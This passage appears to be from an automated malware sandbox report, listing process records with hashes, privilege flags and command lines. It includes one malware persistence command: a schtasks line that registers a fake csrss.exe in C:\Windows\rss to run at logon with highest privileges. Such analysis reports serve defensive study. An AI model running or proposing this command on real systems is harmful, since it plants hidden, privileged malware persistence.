                                                          MD5 hash:61275FE567B258A897943911C450E57E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 2%, ReversingLabs

                                                          General

                                                          Target ID:83
                                                          Start time:11:34:17
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:84
                                                          Start time:11:37:13
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                          Imagebase:0x7ff6642e0000
                                                          File size:235008 bytes
                                                          MD5 hash:796B784E98008854C27F4B18D287BA30
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          General

                                                          Target ID:85
                                                          Start time:11:37:13
                                                          Start date:28/05/2023
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6898f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Disassembly

                                                          No disassembly